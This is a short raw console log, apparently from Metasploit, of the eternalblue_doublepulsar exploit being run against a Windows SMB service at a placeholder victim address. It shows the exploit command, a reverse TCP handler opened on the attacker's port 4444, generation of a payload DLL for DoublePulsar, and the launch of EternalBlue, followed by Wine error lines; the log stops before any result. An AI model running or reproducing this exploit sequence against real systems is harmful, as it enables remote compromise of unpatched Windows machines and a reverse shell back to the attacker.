msf exploit(windows/smb/eternalblue_doublepulsar) > exploit
- Started reverse TCP handler on MIIPLOCAL:4444
- IPVICTIMA:445 - Generating Eternalblue XML data
- IPVICTIMA:445 - Generating Doublepulsar XML data
- IPVICTIMA:445 - Generating payload DLL for Doublepulsar
- IPVICTIMA:445 - Writing DLL in /root/.wine/drive_c/eternal11.dll
- IPVICTIMA:445 - Launching Eternalblue...
0014:err:service:process_send_command receiving command result timed out
0029:err:plugplay:handle_bus_relations Failed to load driver L"WineHID"
0014:err:service:process_send_command receiving command result timed out
0029:err:plugplay:handle_bus_relations Failed to load driver L"WineHID"